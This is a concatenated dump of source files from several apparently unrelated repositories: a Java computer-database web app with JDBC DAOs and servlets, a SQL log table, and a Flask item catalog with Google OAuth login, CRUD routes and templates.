        context?.addLine(to: CGPoint(x: toPoint.x, y: toPoint.y))
        print (fromPoint, " and ", toPoint)
        context?.setBlendMode(CGBlendMode.normal)
        context?.setLineCap(CGLineCap.round)
        context?.setLineWidth(15)
        context?.setStrokeColor(currentColor.cgColor)
        context?.strokePath()
        permView.image = UIGraphicsGetImageFromCurrentImageContext()
        UIGraphicsEndImageContext()
    }
    // (Large blocks of commented-out touch-based drawing code removed.)
    override func didReceiveMemoryWarning() {
        super.didReceiveMemoryWarning()
        // Dispose of any resources that can be recreated.
    }
}
| 299451cb33d6209edccfe5781781474304a0755e | [
"Swift"
] | 1 | Swift | Lharagon/drawingHood | 6ab2cf7b4bb55509ad00c8f15e8d42946bcddbd8 | 2e31b268593b995c63ed5a909412833443cc6bfa |
refs/heads/master | <file_sep>package com.excilys.project.computerDatabase.service;
import java.util.List;
import com.excilys.project.computerDatabase.domain.Company;
import com.excilys.project.computerDatabase.domain.Computer;
import com.excilys.project.computerDatabase.persistance.CompanyDAO;
import com.excilys.project.computerDatabase.persistance.ComputerDAO;
import com.excilys.project.computerDatabase.persistance.ComputerListWrapper;
import com.excilys.project.computerDatabase.persistance.ConnectionManager;
/**
 * Singleton service layer for computers and companies.  Each public method
 * wraps a DAO call and drives the transaction lifecycle through
 * ConnectionManager (start / commit / rollback / close).
 *
 * NOTE(review): actionMessage is instance state mutated on every call and the
 * singleton is shared, so this class is not thread-safe -- confirm single-
 * threaded use or make actionMessage a local variable.
 */
public class ComputerServices {
	private static ComputerDAO computerDAO;
	private static CompanyDAO companyDAO;
	private static ComputerServices service;
	/** Human-readable description of the current action, used in log messages. */
	private String actionMessage;
	private final String errorMessage = " failed : Other Exception";
	private final String successMessage = " succeeded";

	private ComputerServices(){
		computerDAO = ComputerDAO.getInstance();
		companyDAO = CompanyDAO.getInstance();
	}

	/**
	 * Returns the unique instance, creating it on first use.  Synchronized so
	 * that two concurrent first calls cannot each build an instance (the
	 * original unsynchronized check was racy).
	 */
	public static synchronized ComputerServices getInstance(){
		if(service == null) {
			service = new ComputerServices();
		}
		return service;
	}

	/** Lists all companies inside a transaction; returns null on failure. */
	public List<Company> listCompanies(){
		actionMessage = "Listing companies";
		List<Company> list = null;
		try{
			ConnectionManager.INSTANCE.startTransaction();
			list = companyDAO.listCompanies();
			ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
		}catch(Exception ex){
			// Log the failure before rolling back (was silently swallowed).
			ex.printStackTrace();
			ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
		}finally{
			ConnectionManager.INSTANCE.closeConnection();
		}
		return list;
	}

	/** Counts the computers matched by the wrapper's filter; 0 on failure. */
	public int totalCount(ComputerListWrapper wrapper){
		actionMessage = "Counting";
		int total = 0;
		try{
			ConnectionManager.INSTANCE.startTransaction();
			total = computerDAO.totalCount(wrapper);
			ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
		}catch(Exception ex){
			ex.printStackTrace();
			ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
		}finally{
			ConnectionManager.INSTANCE.closeConnection();
		}
		return total;
	}

	/**
	 * Fetches the page of computers described by the wrapper.
	 * NOTE(review): unlike listCompanies() no transaction is started here,
	 * yet rollback is still called on failure -- confirm this is intentional.
	 */
	public List<Computer> getComputerList(ComputerListWrapper wrapper) {
		actionMessage = "Listing computers";
		List<Computer> list = null;
		try{
			list = computerDAO.getList(wrapper);
		}catch(Exception ex){
			ex.printStackTrace();
			ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
		}finally{
			ConnectionManager.INSTANCE.closeConnection();
		}
		return list;
	}

	/** Inserts a computer and logs the id it was stored under. */
	public void addComputer(Computer computer) {
		actionMessage = "Adding " + computer.getName();
		try{
			ConnectionManager.INSTANCE.startTransaction();
			int id = computerDAO.addComputer(computer);
			actionMessage += " at id " + id;
			ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
		}catch(Exception ex){
			ex.printStackTrace();
			ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
		}finally{
			ConnectionManager.INSTANCE.closeConnection();
		}
	}

	/** Updates an existing computer inside a transaction. */
	public void updateComputer(Computer computer) {
		// BUG FIX: the log message previously said "Adding" for an update.
		actionMessage = "Updating " + computer.getName() + " at id " + computer.getId();
		try{
			ConnectionManager.INSTANCE.startTransaction();
			computerDAO.updateComputer(computer);
			ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
		}catch(Exception ex){
			ex.printStackTrace();
			ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
		}finally{
			ConnectionManager.INSTANCE.closeConnection();
		}
	}

	/** Deletes the computer with the given id inside a transaction. */
	public void deleteComputer(String id) {
		actionMessage = "Deleting computer at id " + id;
		try{
			ConnectionManager.INSTANCE.startTransaction();
			computerDAO.deleteComputer(id);
			ConnectionManager.INSTANCE.commit(actionMessage + successMessage);
		}catch(Exception ex){
			ex.printStackTrace();
			ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
		}finally{
			ConnectionManager.INSTANCE.closeConnection();
		}
	}

	/**
	 * Fetches a single computer by id; returns null on failure.
	 * NOTE(review): same missing startTransaction() pattern as getComputerList.
	 */
	public Computer getComputer(String id) {
		actionMessage = "Fetching computer at id " + id;
		Computer c = null;
		try{
			c = computerDAO.getComputer(id);
		}catch(Exception ex){
			ex.printStackTrace();
			ConnectionManager.INSTANCE.rollback(actionMessage + errorMessage);
		}finally{
			ConnectionManager.INSTANCE.closeConnection();
		}
		return c;
	}
}
<file_sep>package com.excilys.project.computerDatabase.controller;
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import com.excilys.project.computerDatabase.service.ComputerServices;
/**
 * Servlet implementation class DeleteComputer.
 * Deletes the computer whose id is passed as the "id" request parameter,
 * then forwards back to the dashboard.
 */
@WebServlet("/DeleteComputer")
public class DeleteComputer extends HttpServlet {
	private static final long serialVersionUID = 1L;

	/**
	 * @see HttpServlet#HttpServlet()
	 */
	public DeleteComputer() {
		super();
		// Nothing to initialise; the service singleton is fetched per request.
	}

	/**
	 * Handles GET /DeleteComputer?id=...
	 * NOTE(review): performing a destructive operation on GET is
	 * unconventional (link prefetchers can trigger it) -- consider doPost.
	 *
	 * @see HttpServlet#doGet(HttpServletRequest request, HttpServletResponse response)
	 */
	protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
		// Delete the requested computer, then re-render the dashboard.
		ComputerServices service = ComputerServices.getInstance();
		service.deleteComputer(request.getParameter("id"));
		request.getRequestDispatcher("Dashboard").forward(request, response);
	}
}
<file_sep>package com.excilys.project.computerDatabase.persistance;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
import com.excilys.project.computerDatabase.domain.Company;
import com.excilys.project.computerDatabase.domain.Log;
/**
 * Singleton DAO for the <code>log</code> table (see log.sql: columns id,
 * class, logDate, action, logType).
 */
public class LogDAO {
	private static LogDAO dao;

	private LogDAO(){}

	/** Returns the unique instance; synchronized to avoid a racy double-init. */
	public static synchronized LogDAO getInstance(){
		if(dao == null) {
			dao = new LogDAO();
		}
		return dao;
	}

	/** Best-effort close of the result set and statement; errors are ignored. */
	private void closeConnections(ResultSet rs, Statement stmt){
		try {
			if (rs != null) rs.close();
			if (stmt != null) stmt.close();
		} catch (SQLException e) {}
	}

	/**
	 * Reads every row of the log table.
	 *
	 * @param cn an open JDBC connection (owned by the caller)
	 * @return the logs, or an empty list if the query failed
	 */
	public List<Log> listLogs(Connection cn) {
		ResultSet rs = null ;
		Statement stmt = null;
		List<Log> liste = new ArrayList<Log>();
		try {
			stmt = cn.createStatement();
			// BUG FIX: these columns belong to the log table; the query
			// previously selected them "FROM company".
			rs = stmt.executeQuery("SELECT id, class, logDate, action, logType FROM log");
			while (rs.next()) {
				Log l = Log.builder()
						.id(rs.getLong(1))
						.className(rs.getString(2))
						.logDate(rs.getDate(3))
						.action(rs.getString(4))
						.logType(rs.getString(5))
						.build();
				liste.add(l);
			}
		} catch (Exception e) {
			e.printStackTrace();
		} finally {
			closeConnections(rs, stmt);
		}
		return liste;
	}

	/** Inserts one log row; id is auto-generated and logDate is set to now(). */
	public void addLog(Connection cn, Log log) {
		ResultSet rs = null ;
		PreparedStatement stmt = null;
		try {
			stmt = cn.prepareStatement("INSERT INTO log "
					+ "(id, class, logDate, action, logType) VALUES(0,?,now(),?,?);");
			stmt.setString(1,log.getClassName());
			stmt.setString(2, log.getAction());
			stmt.setString(3, log.getLogType());
			stmt.execute();
		} catch (Exception e) {
			e.printStackTrace();
		} finally {
			closeConnections(rs,stmt);
		}
	}
}
<file_sep>drop table if exists log;
-- Audit table populated by LogDAO: one row per logged action.
create table log (
-- auto-generated surrogate key
id bigint not null auto_increment,
class varchar(255),
logDate timestamp,
action varchar(255),
logType varchar(10),
constraint pk_log primary key (id))
; | 52e2dee57003a0a14b94947a863f2b8db3fd5047 | [
"Java",
"SQL"
] | 4 | Java | Aetumn/TrainingProject | 7b84ec75ddd2b2b0e7294a006b47eeb50392bf46 | ec36ff283eee75279bca5ec7eb6adb67388bf364 |
refs/heads/master | <file_sep>from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Category, Base, CatItem, User

# Connect to the catalog database and open a session
# (create_engine is imported on the line above this block).
engine = create_engine('sqlite:///catalog_database.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()

# Seed user that owns every category and item created below.
user1 = User(name='<NAME>', email='<EMAIL>',
             picture='https://lh6.googleusercontent.com/-sVcI-LPVb-0/AAAAAAAAAAI/AAAAAAAAAAc/JfhLrXf4Po4/s96-c/photo.jpg')
session.add(user1)
session.commit()

# --- Football ---------------------------------------------------------------
category1 = Category(name='Football', user=user1)
session.add(category1)
session.commit()
catItem1 = CatItem(name="Ball", description="Beautiful Champions League ball",
                   category=category1, user=user1)
session.add(catItem1)
session.commit()
catItem2 = CatItem(name="Shirt", description="Ajax Number 13 Shirt",
                   category=category1, user=user1)
session.add(catItem2)
session.commit()
catItem3 = CatItem(name="Shoes", description="Nike Football Shoes",
                   category=category1, user=user1)
session.add(catItem3)
session.commit()

# --- Basketball -------------------------------------------------------------
category2 = Category(name='Basketball', user=user1)
session.add(category2)
session.commit()
catItem1 = CatItem(name="Jersey",
                   description="A original Chicago Bulls jersey",
                   category=category2, user=user1)
session.add(catItem1)
session.commit()
catItem2 = CatItem(name="Shoes", description="Adidas Basketball Shoes",
                   category=category2, user=user1)
session.add(catItem2)
session.commit()
catItem3 = CatItem(name="Shorts", description="Chicago Bulls Original Shorts",
                   category=category2, user=user1)
session.add(catItem3)
session.commit()

# --- Snowboarding -----------------------------------------------------------
category3 = Category(name='Snowboarding', user=user1)
# BUG FIX: the original re-added category1 here instead of category3.
session.add(category3)
session.commit()
catItem1 = CatItem(name="Goggles", description="Stylish non-fog goggles",
                   category=category3, user=user1)
session.add(catItem1)
session.commit()
catItem2 = CatItem(name="Snowboard",
                   description="Snowboard with custom design",
                   category=category3, user=user1)
session.add(catItem2)
# BUG FIX: a stray trailing comma made this statement a 1-tuple expression.
session.commit()
catItem3 = CatItem(name="Socks",
                   description="Quality socks to keep the cold away",
                   category=category3, user=user1)
session.add(catItem3)
session.commit()

# BUG FIX: Python 2 `print` statement -> print() function (the companion
# Flask app in this project is written for Python 3); also fixed "Datbase".
print("Database has been filled!")
<file_sep>Flask==1.0.2
httplib2==0.11.3
oauth2client==4.1.3
psycopg2==2.7.5
SQLAlchemy==1.2.13<file_sep>{% extends "layout.html" %}
{% block title %}View Items{% endblock %}
{% block content %}
{# Category detail page: heading, owner-only actions, then the item list. #}
<div class="container sections">
  <h2>{{ category.name }} ({{ total }}{% if total == 1 %} item{% else %} items{% endif %})</h2>
  {# Edit/add/delete actions are only shown to the category's owner. #}
  {% if session['user_id'] == category.user_id %}
  <div class="row">
    <div class="col-md-12">
      {# BUG FIX: the Edit control used inverted tag nesting
         (<button><a>...</button></a>); all three now use <a><button>. #}
      <a href="{{ url_for('edit_category', category_id=category.id) }}"><button class="btn btn-link">Edit</button></a>
      <a href="{{ url_for('add_item_by_category', category_id=category.id) }}"><button class="btn btn-link" style="color:green">Add item </button></a>
      <a href="{{ url_for('delete_category', category_id=category.id) }}"><button class="btn btn-link" style="color:red">Delete</button></a>
    </div>
  </div>
  {% endif %}
  {% if total == 0 %}
  <p>No items are present in this category.</p>
  {% else %}
  <table class="table table-hover">
    <tbody>
      {% for item in items %}
      <tr>
        <td><a href="{{ url_for('view_item', item_id=item.id) }}"><p>{{ item.name }}</p></a></td>
      </tr>
      {% endfor %}
    </tbody>
  </table>
  {% endif %}
{# BUG FIX: the container/row/col divs were never closed before endblock. #}
</div>
{% endblock %}<file_sep>#!/usr/bin/env python
from flask import Flask, render_template, request, redirect, jsonify
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from database_setup import Base, User, Category, CatItem
from flask import session as login_session
import random
import string
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import httplib2
import json
from flask import make_response, flash, url_for
import requests
# Flask application object used by all the @app.route views below.
app = Flask(__name__)
# Load the Google Sign-in API Client ID.
CLIENT_ID = json.loads(
    open('client_secrets.json', 'r').read())['web']['client_id']
# Connect to the database and create a database session.
# check_same_thread=False lets the single module-level session be used from
# Flask's worker threads (SQLite-specific flag).
engine = create_engine('sqlite:///catalog_database.db',
                       connect_args={'check_same_thread': False})
# Bind the above engine to a session.
Session = sessionmaker(bind=engine)
# Create a Session object (shared by every request handler in this module).
session = Session()
@app.route('/show')
def show():
    """Debug helper: dump the current login session.

    BUG FIX: a Flask view must return a response; returning None made this
    endpoint raise a 500.  NOTE(review): '/show' is also routed to Show()
    later in this module -- consider removing one of the two.
    """
    print(login_session)
    return str(dict(login_session))
# Redirect to login page.
@app.route('/')
@app.route('/catalog/')
@app.route('/catalog/items/')
def home():
    """Render the catalog landing page with every category and every item."""
    return render_template(
        'index.html',
        categories=session.query(Category).all(),
        catitems=session.query(CatItem).all())
# Create anti-forgery state token
@app.route('/login/')
def login():
    """Mint an anti-forgery state token and render the login page."""
    alphabet = string.ascii_uppercase + string.digits
    state = ''.join(random.choice(alphabet) for _ in range(32))
    login_session['state'] = state
    return render_template('login.html', STATE=state)
# Connect to the Google Sign-in oAuth method.
@app.route('/gconnect', methods=['POST'])
def gconnect():
    """Complete the Google sign-in handshake.

    Exchanges the one-time authorization code POSTed by the client for
    credentials, validates the access token, stores the user's identity in
    the Flask session (creating a User row if needed) and returns a small
    welcome HTML snippet.
    """
    # Validate the anti-forgery state token minted by login().
    if request.args.get('state') != login_session['state']:
        response = make_response(json.dumps('Invalid state parameter.'), 401)
        response.headers['Content-Type'] = 'application/json'
        return response
    # Obtain authorization code
    code = request.data.decode('utf-8')
    try:
        # Upgrade the authorization code into a credentials object
        oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')
        oauth_flow.redirect_uri = 'postmessage'
        credentials = oauth_flow.step2_exchange(code)
    except FlowExchangeError:
        response = make_response(
            json.dumps('Failed to upgrade the authorization code.'), 401)
        response.headers['Content-Type'] = 'application/json'
        return response
    # Check that the access token is valid.
    access_token = credentials.access_token
    url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'
           % access_token)
    # Submit request, parse response - Python3 compatible
    h = httplib2.Http()
    response = h.request(url, 'GET')[1]
    str_response = response.decode('utf-8')
    result = json.loads(str_response)
    # If there was an error in the access token info, abort.
    if result.get('error') is not None:
        response = make_response(json.dumps(result.get('error')), 500)
        response.headers['Content-Type'] = 'application/json'
        return response
    # Verify that the access token is used for the intended user.
    gplus_id = credentials.id_token['sub']
    if result['user_id'] != gplus_id:
        response = make_response(
            json.dumps("Token's user ID doesn't match given user ID."), 401)
        response.headers['Content-Type'] = 'application/json'
        return response
    # Verify that the access token is valid for this app.
    if result['issued_to'] != CLIENT_ID:
        response = make_response(
            json.dumps("Token's client ID does not match app's."), 401)
        response.headers['Content-Type'] = 'application/json'
        return response
    # Short-circuit when this browser session is already signed in.
    stored_access_token = login_session.get('access_token')
    stored_gplus_id = login_session.get('gplus_id')
    if stored_access_token is not None and gplus_id == stored_gplus_id:
        response = make_response(
            json.dumps('Current user is already connected.'), 200)
        # NOTE(review): a blank Content-Type looks accidental -- confirm it
        # should be 'application/json'.
        response.headers['Content-Type'] = ' '
        return response
    # Store the access token in the session for later use.
    login_session['access_token'] = credentials.access_token
    login_session['gplus_id'] = gplus_id
    # Fetch the user's profile (name, picture, email) from Google.
    userinfo_url = "https://www.googleapis.com/oauth2/v1/userinfo"
    params = {'access_token': credentials.access_token, 'alt': 'json'}
    answer = requests.get(userinfo_url, params=params)
    data = answer.json()
    login_session['username'] = data['name']
    login_session['picture'] = data['picture']
    login_session['email'] = data['email']
    login_session['provider'] = 'google'
    # See if the user exists in our database; if not, create a User row.
    user_id = getUserID(login_session['email'])
    if not user_id:
        user_id = createUser(login_session)
    login_session['user_id'] = user_id
    # Build the welcome snippet returned to the sign-in popup.
    output = ''
    output += '<h1>Welcome, '
    output += login_session['username']
    output += '!</h1>'
    output += '<img src="'
    output += login_session['picture']
    flash("Welcome! %s" % login_session['username'])
    return output
# Disconnect Google Account.
def gdisconnect():
    """Disconnect the Google account of the current logged-in user.

    NOTE(review): this definition is dead code -- it is shadowed by the
    @app.route('/gdisconnect') function of the same name defined later in
    this module, so it can never be called.  Consider deleting it.
    """
    # Only disconnect the connected user.
    access_token = login_session.get('access_token')
    if access_token is None:
        response = make_response(
            json.dumps('Current user not connected.'), 401)
        response.headers['Content-Type'] = 'application/json'
        return response
    # Revoke the token via Google's revoke endpoint.
    url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token
    h = httplib2.Http()
    result = h.request(url, 'GET')[0]
    if result['status'] == '200':
        response = make_response(json.dumps('Successfully disconnected.'), 200)
        response.headers['Content-Type'] = 'application/json'
        return response
    else:
        response = make_response(
            json.dumps('Failed to revoke token for given user.'), 400)
        response.headers['Content-Type'] = 'application/json'
        return response
def createUser(login_session):
    """Persist a new User built from the login session; return its id."""
    db = sessionmaker(bind=engine)()
    db.add(User(name=login_session['username'],
                email=login_session['email'],
                picture=login_session['picture']))
    db.commit()
    return db.query(User).filter_by(email=login_session['email']).one().id
def getUserInfo(user_id):
    """Fetch the User row with the given primary key."""
    db = sessionmaker(bind=engine)()
    return db.query(User).filter_by(id=user_id).one()
def getUserID(email):
    """Return the id of the User with this email, or None if the lookup fails.

    .one() raises when zero or multiple rows match; both cases are treated
    as "no such user".
    """
    DBSession = sessionmaker(bind=engine)
    session = DBSession()
    try:
        user = session.query(User).filter_by(email=email).one()
        return user.id
    except Exception:
        # BUG FIX: a bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt; catch only ordinary exceptions.
        return None
# DISCONNECT - Revoke a current user's token and reset their login_session
@app.route('/gdisconnect')
def gdisconnect():
    """Revoke the current user's Google token and clear the session.

    On success the user is redirected home; on failure a JSON error with
    status 400 is returned.
    """
    # Only disconnect a connected user
    access_token = login_session.get('access_token')
    if access_token is None:
        response = make_response(
            json.dumps('Current user not connected.'), 401)
        response.headers['Content-type'] = 'application/json'
        return response
    revoke = requests.post('https://accounts.google.com/o/oauth2/revoke',
                           params={'token': access_token},
                           headers={'content-type':
                                    'application/x-www-form-urlencoded'})
    status_code = revoke.status_code
    if status_code == 200:
        # Forget everything gconnect stored.  pop() with a default is used
        # instead of `del` so a partially-populated session cannot KeyError.
        login_session.pop('access_token', None)
        login_session.pop('gplus_id', None)
        login_session.pop('username', None)
        login_session.pop('email', None)
        login_session.pop('picture', None)
        flash("You have successfully logged out")
        # (Removed a dead bare `redirect('/')` call and an unused response.)
        return redirect('/')
    else:
        # BUG FIX: the 400 was previously passed to json.dumps() instead of
        # make_response(), so failures were returned with status 200.
        response = make_response(
            json.dumps('Failed to revoke token for given user.'), 400)
        response.headers['Content-Type'] = 'application/json'
        return response
# Use to completely clear your login session if logging out does not work
@app.route('/clearSession')
def clear_session():
    """Debug escape hatch: wipe the whole login session unconditionally."""
    login_session.clear()
    return "session deleted"
# Log out the currently connected user.
@app.route('/logout')
def logout():
    """Log out the currently connected user and redirect home."""
    if 'username' in login_session:
        gdisconnect()
        # BUG FIX: the old `del` calls raised KeyError -- gdisconnect()
        # already removes most Google keys, and 'google_id' is never set
        # (gconnect stores 'gplus_id').  pop() with a default is safe.
        for key in ('google_id', 'gplus_id', 'access_token', 'username',
                    'email', 'picture', 'user_id', 'provider'):
            login_session.pop(key, None)
        flash("You have been logged out!")
        return redirect(url_for('home'))
    else:
        flash("You were not logged in!")
        return redirect(url_for('home'))
# Create new user.
def create_user(login_session):
    """Create a new User record from the given login session.

    Argument:
        login_session (dict): The login session.

    Returns the id of the newly created user.
    """
    session.add(User(
        name=login_session['username'],
        email=login_session['email'],
        picture=login_session['picture'],
    ))
    session.commit()
    return session.query(User).filter_by(
        email=login_session['email']).one().id
def get_user_info(user_id):
    """Return the User row whose id matches user_id."""
    return session.query(User).filter_by(id=user_id).one()
def get_user_id(email):
    """Return the id of the User with this email, or None if the lookup fails."""
    try:
        user = session.query(User).filter_by(email=email).one()
        return user.id
    except Exception:
        # BUG FIX: a bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt; catch only ordinary exceptions.
        return None
@app.route("/show")
def Show():
    """Debug helper: print and return the keys stored in the login session.

    BUG FIX: a Flask view must return a response; returning None raised 500.
    NOTE(review): '/show' is also routed to show() earlier in this module --
    consider removing one of the two handlers.
    """
    keys = []
    for data in login_session:
        print(data)
        keys.append(data)
    return '\n'.join(keys)
# Add a new category.
@app.route("/catalog/category/new/", methods=['GET', 'POST'])
def add_category():
    """Show the new-category form (GET) or create the category (POST).

    Requires a logged-in user; rejects empty and duplicate category names.
    """
    if 'username' not in login_session:
        flash("Please log in to continue.")
        return redirect(url_for('login'))
    if request.method != 'POST':
        return render_template('newcategory.html')
    name = request.form['new-category-name']
    if name == '':
        flash('The field cannot be empty.')
        return redirect(url_for('home'))
    if session.query(Category).filter_by(name=name).first() is not None:
        flash('The entered category already exists.')
        return redirect(url_for('add_category'))
    new_category = Category(name=name, user_id=login_session['user_id'])
    session.add(new_category)
    session.commit()
    flash('New category %s successfully created!' % new_category.name)
    return redirect(url_for('home'))
# Create a new item.
@app.route("/catalog/item/new/", methods=['GET', 'POST'])
def add_item():
    """Create a new item owned by the logged-in user.

    GET renders the form (with the user's items and categories);
    POST rejects duplicates by name and inserts the row.
    NOTE(review): the duplicate check and the insert use the ``Item``
    model while the GET branch (and the rest of this module) query
    ``CatItem`` -- verify against the models module whether these are
    really two distinct tables or a copy/paste slip.
    """
    if 'username' not in login_session:
        flash("Please log in to continue.")
        return redirect(url_for('login'))
    elif request.method == 'POST':
        # Check if the item already exists in the database.
        # If it does, display an error.
        item = session.query(Item).filter_by(name=request.form['name']).first()
        if item:
            if item.name == request.form['name']:
                flash('The item already exists')
                return redirect(url_for("add_item"))
        new_item = Item(
            name=request.form['name'],
            category_id=request.form['category'],
            description=request.form['description'],
            user_id=login_session['user_id']
        )
        session.add(new_item)
        session.commit()
        flash('New item successfully created!')
        return redirect(url_for('home'))
    else:
        # GET: render the form with this user's items and categories.
        items = session.query(CatItem).\
            filter_by(user_id=login_session['user_id']).all()
        categories = session.query(Category).\
            filter_by(user_id=login_session['user_id']).all()
        return render_template(
            'newitem.html',
            items=items,
            categories=categories
        )
# Create new item by Category ID.
@app.route("/catalog/category/<int:category_id>/item/new/",
           methods=['GET', 'POST'])
def add_item_by_category(category_id):
    """Create a new CatItem directly inside the given category.

    GET renders the category-specific form; POST rejects duplicate
    names and inserts the row, then redirects to the category listing.
    NOTE(review): on a duplicate name this redirects to 'add_item'
    rather than back to this category-specific form -- confirm intended.
    """
    if 'username' not in login_session:
        flash("You were not authorised to access that page.")
        return redirect(url_for('login'))
    elif request.method == 'POST':
        # Check if the item already exists in the database.
        # If it does, display an error.
        item = session.query(CatItem).filter_by(
            name=request.form['name']).first()
        if item:
            if item.name == request.form['name']:
                flash('The item already exists')
                return redirect(url_for("add_item"))
        new_item = CatItem(
            name=request.form['name'],
            category_id=category_id,
            description=request.form['description'],
            user_id=login_session['user_id'])
        session.add(new_item)
        session.commit()
        flash('New item created!')
        return redirect(url_for('show_items_in_category',
                                category_id=category_id))
    else:
        category = session.query(Category).filter_by(id=category_id).first()
        return render_template('neweritem.html', category=category)
# Check if the item exists in the database,
def exists_item(item_id):
    """Return True iff a CatItem row with this id exists."""
    return session.query(CatItem).filter_by(id=item_id).first() is not None
# Check if the category exists in the database.
def exists_category(category_id):
    """Return True iff a Category row with this id exists."""
    return session.query(Category).filter_by(id=category_id).first() is not None
# View an item by its ID.
@app.route('/catalog/item/<int:item_id>/')
def view_item(item_id):
    """Public detail page for a single CatItem (no login required)."""
    if exists_item(item_id):
        item = session.query(CatItem).filter_by(id=item_id).first()
        # Load the item's category and owning user for the template.
        category = session.query(Category)\
            .filter_by(id=item.category_id).first()
        owner = session.query(User).filter_by(id=item.user_id).first()
        return render_template(
            "viewitem.html",
            item=item,
            category=category,
            owner=owner
        )
    else:
        flash('We are unable to process your request.')
        return redirect(url_for('home'))
# Edit existing item.
@app.route("/catalog/item/<int:item_id>/edit/", methods=['GET', 'POST'])
def edit_item(item_id):
    """Update one CatItem after login, existence and ownership checks.

    POST overwrites only the form fields submitted non-empty, then
    redirects back to this edit page; GET renders the form with the
    user's categories.
    """
    if 'username' not in login_session:
        flash("Please log in.")
        return redirect(url_for('login'))
    if not exists_item(item_id):
        flash("We are unable to process your request.")
        return redirect(url_for('home'))
    item = session.query(CatItem).filter_by(id=item_id).first()
    # Only the item's owner may edit it.
    if login_session['user_id'] != item.user_id:
        flash("You are not authorised to access that page.")
        return redirect(url_for('home'))
    if request.method == 'POST':
        # Apply only the non-empty form fields.
        if request.form['name']:
            item.name = request.form['name']
        if request.form['description']:
            item.description = request.form['description']
        if request.form['category']:
            item.category_id = request.form['category']
        session.add(item)
        session.commit()
        flash('Item successfully updated!')
        return redirect(url_for('edit_item', item_id=item_id))
    else:
        categories = session.query(Category).\
            filter_by(user_id=login_session['user_id']).all()
        return render_template(
            'updateitem.html',
            item=item,
            categories=categories
        )
# Delete existing item.
@app.route("/catalog/item/<int:item_id>/delete/", methods=['GET', 'POST'])
def delete_item(item_id):
    """Delete one CatItem after login, existence and ownership checks.

    GET shows a confirmation page; POST performs the delete.
    """
    if 'username' not in login_session:
        flash("Please log in to continue.")
        return redirect(url_for('login'))
    if not exists_item(item_id):
        flash("We are unable to process your request right now.")
        return redirect(url_for('home'))
    item = session.query(CatItem).filter_by(id=item_id).first()
    # Only the item's owner may delete it.
    if login_session['user_id'] != item.user_id:
        flash("You were not authorised to access that page.")
        return redirect(url_for('home'))
    if request.method == 'POST':
        session.delete(item)
        session.commit()
        flash("Item successfully deleted!")
        return redirect(url_for('home'))
    else:
        return render_template('delete.html', item=item)
# Show items in a particular category.
@app.route('/catalog/category/<int:category_id>/items/')
def show_items_in_category(category_id):
    """Public listing of every CatItem inside one category."""
    if not exists_category(category_id):
        flash("We are unable to process your request right now.")
        return redirect(url_for('home'))
    selected = session.query(Category).filter_by(id=category_id).first()
    # One query object, used both for the rows and for the row count.
    item_query = session.query(CatItem).filter_by(category_id=selected.id)
    return render_template(
        'items.html',
        category=selected,
        items=item_query.all(),
        total=item_query.count())
# Edit a category.
@app.route('/catalog/category/<int:category_id>/edit/',
           methods=['GET', 'POST'])
def edit_category(category_id):
    """Rename one Category after login, existence and ownership checks.

    GET renders the edit form; POST applies the new name (when
    non-empty) and redirects to the category's item listing.
    """
    category = session.query(Category).filter_by(id=category_id).first()
    if 'username' not in login_session:
        flash("Please log in to continue.")
        return redirect(url_for('login'))
    if not exists_category(category_id):
        flash("We are unable to process your request right now.")
        return redirect(url_for('home'))
    # If the logged in user does not have authorisation to
    # edit the category, redirect to homepage.
    if login_session['user_id'] != category.user_id:
        flash("We are unable to process your request right now.")
        return redirect(url_for('home'))
    if request.method == 'POST':
        if request.form['name']:
            category.name = request.form['name']
        session.add(category)
        session.commit()
        flash('Category successfully updated!')
        return redirect(url_for('show_items_in_category',
                                category_id=category.id))
    else:
        # Bug fix: the template name had a doubled extension
        # ('editcategory.html.html'), which can never match the
        # template file on disk.
        return render_template('editcategory.html', category=category)
# Delete a category.
@app.route('/catalog/category/<int:category_id>/delete/',
           methods=['GET', 'POST'])
def delete_category(category_id):
    """Delete one Category after login, existence and ownership checks.

    GET shows a confirmation page; POST performs the delete.
    """
    category = session.query(Category).filter_by(id=category_id).first()
    if 'username' not in login_session:
        flash("Please log in to continue.")
        return redirect(url_for('login'))
    if not exists_category(category_id):
        flash("We are unable to process your request right now.")
        return redirect(url_for('home'))
    # If the logged in user does not have authorisation to
    # edit the category, redirect to homepage.
    if login_session['user_id'] != category.user_id:
        flash("We are unable to process your request right now.")
        return redirect(url_for('home'))
    if request.method == 'POST':
        session.delete(category)
        session.commit()
        flash("Category successfully deleted!")
        return redirect(url_for('home'))
    else:
        return render_template("deletecategory.html", category=category)
# JSON Endpoints
# Return JSON of all the items in the catalog.
@app.route('/api/v1/catalog.json')
def show_catalog_json():
    """Serialize every CatItem, newest (highest id) first."""
    items = session.query(CatItem).order_by(CatItem.id.desc())
    return jsonify(catalog=[i.serialize for i in items])
# Return JSON of a particular item in the catalog.
@app.route(
    '/api/v2/categories/<int:category_id>/item/<int:item_id>/JSON')
def catalog_item_json(category_id, item_id):
    """Serialize one CatItem, checking it belongs to the given category."""
